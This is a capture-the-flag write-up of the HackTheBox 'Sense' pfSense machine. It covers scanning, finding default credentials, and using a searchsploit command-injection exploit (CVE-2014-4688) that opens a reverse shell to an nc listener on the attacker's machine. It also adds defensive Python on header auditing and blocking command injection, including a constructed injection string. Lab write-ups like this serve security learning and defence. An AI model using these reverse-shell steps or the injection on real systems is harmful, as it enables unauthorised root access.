HackTheBox Write-Up — Sense

Bradley Fell, @FellSEC
6 min read · Jun 12, 2020


Sense highlights the importance of thorough enumeration while taking advantage of a vulnerable application running with administrative privileges.

nmap -T4 -p- 10.10.10.60

Starting Nmap 7.70 ( https://nmap.org ) at 2020-06-08 20:04 EDT
Nmap scan report for 10.10.10.60
Host is up (0.015s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE
80/tcp open http
443/tcp open https
Nmap done: 1 IP address (1 host up) scanned in 94.63 seconds

nmap -T4 -A -p80,443 10.10.10.60

Starting Nmap 7.70 ( https://nmap.org ) at 2020-06-08 20:06 EDT
Nmap scan report for 10.10.10.60
Host is up (0.014s latency).
PORT STATE SERVICE VERSION
80/tcp open http lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Did not follow redirect to https://10.10.10.60/
443/tcp open ssl/http lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Login
| ssl-cert: Subject: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US
| Not valid before: 2017-10-14T19:21:35
|_Not valid after: 2023-04-06T19:21:35
|_ssl-date: ERROR: Script execution failed (use -d to debug)

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|general purpose
Running (JUST GUESSING): Comau embedded (92%), FreeBSD 8.X (85%), OpenBSD 4.X (85%)
OS CPE: cpe:/o:freebsd:freebsd:8.1 cpe:/o:openbsd:openbsd:4.0
Aggressive OS guesses: Comau C4G robot control unit (92%), FreeBSD 8.1 (85%), OpenBSD 4.0 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 12.27 ms 10.10.14.1
2 12.33 ms 10.10.10.60
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.10 seconds

Since the Nmap output gives us little to go on and port 80 only redirects to HTTPS, we run a Nikto scan against port 443.

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.60
+ Target Hostname: 10.10.10.60
+ Target Port: 443

---------------------------------------------------------------------------
+ SSL Info: Subject: /C=US/ST=Somewhere/L=Somecity/O=CompanyName/OU=Organizational Unit Name (eg, section)/CN=Common Name (eg, YOUR name)/emailAddress=Email Address
Ciphers: AES256-SHA
Issuer: /C=US/ST=Somewhere/L=Somecity/O=CompanyName/OU=Organizational Unit Name (eg, section)/CN=Common Name (eg, YOUR name)/emailAddress=Email Address
+ Start Time: 2020-06-08 23:46:42 (GMT-4)
---------------------------------------------------------------------------
+ Server: lighttpd/1.4.35
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie cookie_test created without the secure flag
+ Cookie cookie_test created without the httponly flag
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Hostname '10.10.10.60' does not match certificate's names: Common
+ Multiple index files found: /index.html, /index.php
+ OSVDB-112004: /: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ OSVDB-112004: /index.php: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
+ OSVDB-3092: /tree/: This might be interesting...
+ OSVDB-3092: /xmlrpc.php: xmlrpc.php was found.
+ /help.php: A help file was found.
+ 7500 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time: 2020-06-08 23:55:40 (GMT-4) (538 seconds)
--------------------------------------------------------------------

Nikto reports the same "Shellshock" finding we saw in my write-up on Shocker, and it also turns up a directory named "tree." Inside that directory we find a possibly vulnerable application, complete with a version number.

SilverStripe Tree Control v0.1
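The header and cookie findings in the Nikto output above are easy to re-check on their own, without a full scan. The Python below is an added example, not part of the original write-up and not Nikto's code: it audits a captured HTTPS response for the same items Nikto flagged here (Strict-Transport-Security, X-Content-Type-Options, X-XSS-Protection, and the Secure/HttpOnly flags on every Set-Cookie). The two sample responses are constructed: one mirrors what the Nikto findings imply about the pfSense login page, the other is a hardened counterpart with every finding addressed.

```python
from __future__ import annotations

# Constructed sample response: what Nikto's findings above imply about the
# login page on https://10.10.10.60 (lighttpd 1.4.35, no HSTS, no
# X-Content-Type-Options, no X-XSS-Protection, cookie_test without flags).
# The list-of-pairs shape is what http.client.HTTPResponse.getheaders() returns.
SAMPLE_RESPONSE: list[tuple[str, str]] = [
    ("Server", "lighttpd/1.4.35"),
    ("Content-Type", "text/html; charset=UTF-8"),
    ("Set-Cookie", "cookie_test=1; path=/"),
]

# Constructed hardened counterpart: same server, every finding addressed.
HARDENED_RESPONSE: list[tuple[str, str]] = [
    ("Server", "lighttpd/1.4.35"),
    ("Content-Type", "text/html; charset=UTF-8"),
    ("Strict-Transport-Security", "max-age=31536000; includeSubDomains"),
    ("X-Content-Type-Options", "nosniff"),
    ("X-XSS-Protection", "1; mode=block"),
    ("Set-Cookie", "cookie_test=1; path=/; Secure; HttpOnly; SameSite=Strict"),
]

# Headers an HTTPS admin interface should send, keyed by lowercase name.
# X-XSS-Protection is listed because Nikto flags it; current browsers ignore
# it, so a Content-Security-Policy is the real defence against XSS.
REQUIRED_HEADERS = {
    "strict-transport-security": "Strict-Transport-Security not set on an HTTPS response",
    "x-content-type-options": "X-Content-Type-Options: nosniff not set",
    "x-xss-protection": "X-XSS-Protection not set (legacy header; prefer Content-Security-Policy)",
}


def parse_set_cookie(value: str) -> tuple[str, set[str]]:
    """Split one Set-Cookie value into (cookie name, lowercase attribute names)."""
    parts = [p.strip() for p in value.split(";")]
    name = parts[0].split("=", 1)[0].strip()
    attrs = {p.split("=", 1)[0].strip().lower() for p in parts[1:] if p}
    return name, attrs


def audit_response(headers: list[tuple[str, str]], https: bool = True) -> list[str]:
    """Return the findings for one response, in the spirit of Nikto's header checks.

    headers: (name, value) pairs; repeated Set-Cookie headers are all examined.
    https:   whether the response came over TLS (HSTS and Secure only matter then).
    """
    present = {name.lower() for name, _ in headers}
    findings: list[str] = []

    for header, message in REQUIRED_HEADERS.items():
        if header == "strict-transport-security" and not https:
            continue  # HSTS is only meaningful on an HTTPS response
        if header not in present:
            findings.append(message)

    for name, value in headers:
        if name.lower() != "set-cookie":
            continue
        cookie, attrs = parse_set_cookie(value)
        if https and "secure" not in attrs:
            findings.append(f"cookie {cookie} set without the Secure flag")
        if "httponly" not in attrs:
            findings.append(f"cookie {cookie} set without the HttpOnly flag")
    return findings


if __name__ == "__main__":
    for label, response in (("as scanned", SAMPLE_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        findings = audit_response(response)
        print(f"{label}: {len(findings)} finding(s)")
        for finding in findings:
            print("  -", finding)
```

Because the input is the same list of pairs that `http.client.HTTPResponse.getheaders()` returns, the audit can be pointed at a live response with one extra call. On the server side, the missing headers are a web-server setting (lighttpd adds them through `setenv.add-response-header` in mod_setenv), while the cookie flags are set by the application that issues the cookie, not by the web server.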

After not getting very far with this version number, I decided to directory brute-force port 443 and then repeat the scan looking for specific file types as well.

gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://10.10.10.60 -k

Gobuster v1.4.1              OJ Reeves (@TheColonial)
=====================================================
=====================================================
[+] Mode : dir
[+] Url/Domain : https://10.10.10.60/
[+] Threads : 10
[+] Wordlist : /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307
=====================================================
/themes (Status: 301)
/css (Status: 301)
/includes (Status: 301)
/javascript (Status: 301)
/classes (Status: 301)
/widgets (Status: 301)
/tree (Status: 301)
/shortcuts (Status: 301)
/installer (Status: 301)
/wizards (Status: 301)
/csrf (Status: 301)
/filebrowser (Status: 301)
=====================================================

gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://10.10.10.60 -k -x php,txt

Gobuster v1.4.1              OJ Reeves (@TheColonial)
=====================================================
=====================================================
[+] Mode : dir
[+] Url/Domain : https://10.10.10.60/
[+] Threads : 10
[+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 204,301,302,307,200
[+] Extensions : .php,.txt
=====================================================
/index.php (Status: 200)
/help.php (Status: 200)
/themes (Status: 301)
/stats.php (Status: 200)
/css (Status: 301)
/edit.php (Status: 200)
/includes (Status: 301)
/license.php (Status: 200)
/system.php (Status: 200)
/status.php (Status: 200)
/javascript (Status: 301)
/changelog.txt (Status: 200)
/classes (Status: 301)
/exec.php (Status: 200)
/widgets (Status: 301)
/graph.php (Status: 200)
/tree (Status: 301)
/wizard.php (Status: 200)
/shortcuts (Status: 301)
/pkg.php (Status: 200)
/installer (Status: 301)
/wizards (Status: 301)
/xmlrpc.php (Status: 200)
/reboot.php (Status: 200)
/interfaces.php (Status: 200)
/csrf (Status: 301)
/system-users.txt (Status: 200)
/filebrowser (Status: 301)

https://10.10.10.60/system-users.txt

We appear to have credentials…

Rohit | company defaults

These credentials do not work as written. "Company defaults" suggests the password is simply whatever default the application ships with.

Viewing the page source of the application reveals its full name: "pfsense."

A quick Google search shows that the default pfSense password is "pfsense."

rohit | pfsense

The credentials above work. We find a version number upon login.

Searchsploit lists a number of exploits, but the one that matches our version is "pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection."

searchsploit pfsense

searchsploit -m 43560

This exploit appears to be a Python-3 script with the following arguments:

#!/usr/bin/env python3
# Exploit Title: pfSense <= 2.1.3 status_rrd_graph_img.php Command Injection.
# Date: 2018-01-12
# Exploit Author: absolomb
# Vendor Homepage: https://www.pfsense.org/
# Software Link: https://atxfiles.pfsense.org/mirror/downloads/old/
# Version: <=2.1.3
# Tested on: FreeBSD 8.3-RELEASE-p16
# CVE : CVE-2014-4688
import argparse
import requests
import urllib
import urllib3
import collections
'''
pfSense <= 2.1.3 status_rrd_graph_img.php Command Injection.
This script will return a reverse shell on specified listener address and port.
Ensure you have started a listener to catch the shell before running!
'''
parser = argparse.ArgumentParser()
parser.add_argument("--rhost", help = "Remote Host")
parser.add_argument('--lhost', help = 'Local Host listener')
parser.add_argument('--lport', help = 'Local Port listener')
parser.add_argument("--username", help = "pfsense Username")
parser.add_argument("--password", help = "pfsense Password")

args = parser.parse_args()
rhost = args.rhost
lhost = args.lhost
lport = args.lport
username = args.username
password = args.password

We set up a listener on the chosen port, then run the exploit against it:

nc -nlvp 1234

python3 43560.py --rhost 10.10.10.60 --lhost 10.10.14.27 --lport 1234 --username rohit --password pfsense

The shell comes back as root: the application itself is already running as root, so no privilege escalation is needed. The root flag is at /root/root.txt and the user flag at /home/rohit/user.txt!
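Why does one request parameter hand over a root shell? CVE-2014-4688 is a command-injection bug: status_rrd_graph_img.php passed the database value from the request into a shell command built around rrdtool, and because the pfSense web interface runs as root, the injected command runs as root too. The Python below is an added illustration, not pfSense code and not the exploit: it puts the vulnerable string-concatenation pattern (returned as a string, never executed) next to a hardened builder that allowlists the RRD file name and hands rrdtool an argv list with no shell in between. The RRD directory, the graph arguments, the function names and the constructed injection string are all assumptions for the example.

```python
from __future__ import annotations

import re
import subprocess
from pathlib import PurePosixPath

# Assumed location of the RRD databases; the exact path is an assumption
# for the example, not taken from pfSense.
RRD_DIR = PurePosixPath("/var/db/rrd")

# Allowlist for a database name: letters, digits, '_', '-' and '.', ending in
# ".rrd". Everything else (';', '|', '$', backticks, spaces, '/') fails the match.
RRD_NAME_RE = re.compile(r"[A-Za-z0-9_\-]+(?:\.[A-Za-z0-9_\-]+)*\.rrd")

# Hypothetical output file and graph definition, kept constant so the example
# focuses on the one attacker-controlled value: the database name.
GRAPH_PNG = "/tmp/graph.png"


def build_graph_command_unsafe(database: str) -> str:
    """The vulnerable pattern (the CVE-2014-4688 class of bug): the request
    parameter is concatenated into a command line destined for a shell, so any
    shell metacharacters in `database` survive untouched. This function only
    returns the string; it never executes anything."""
    return (
        f"rrdtool graph {GRAPH_PNG} "
        f"DEF:a={RRD_DIR}/{database}:data:AVERAGE LINE1:a#0000FF"
    )


def is_valid_rrd_name(database: str) -> bool:
    """True only if the name matches the allowlist and stays inside RRD_DIR."""
    if not RRD_NAME_RE.fullmatch(database):
        return False
    # With the regex above this cannot fail, but checking the resolved parent
    # is a cheap second line of defence if the regex is ever loosened.
    return (RRD_DIR / database).parent == RRD_DIR


def build_graph_argv(database: str) -> list[str]:
    """Hardened form: allowlist the name, then return an argv list so that
    rrdtool is executed directly, with no shell to interpret metacharacters."""
    if not is_valid_rrd_name(database):
        raise ValueError(f"rejected database name: {database!r}")
    return [
        "rrdtool", "graph", GRAPH_PNG,
        f"DEF:a={RRD_DIR / database}:data:AVERAGE",
        "LINE1:a#0000FF",
    ]


def render_graph(database: str) -> subprocess.CompletedProcess:
    """Run rrdtool with the validated argv (needs rrdtool on PATH).
    shell=False is already the default; it is spelled out to make the point."""
    return subprocess.run(build_graph_argv(database), shell=False,
                          check=True, capture_output=True, text=True)


if __name__ == "__main__":
    attempt = "system-cpu.rrd;echo injected"   # constructed injection attempt
    print("unsafe command string:", build_graph_command_unsafe(attempt))
    try:
        build_graph_argv(attempt)
    except ValueError as exc:
        print("hardened builder:", exc)
    print("hardened builder accepts:", build_graph_argv("system-cpu.rrd"))
```

The allowlist plus argv-list combination removes the injection, but it addresses only half of what this box demonstrates. The other half is the privilege level: because the web interface runs as root, any bug in it is a root bug. Running the interface under a dedicated unprivileged account, with a narrowly scoped helper for the few operations that genuinely need root, would have turned the same flaw into a far smaller incident.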
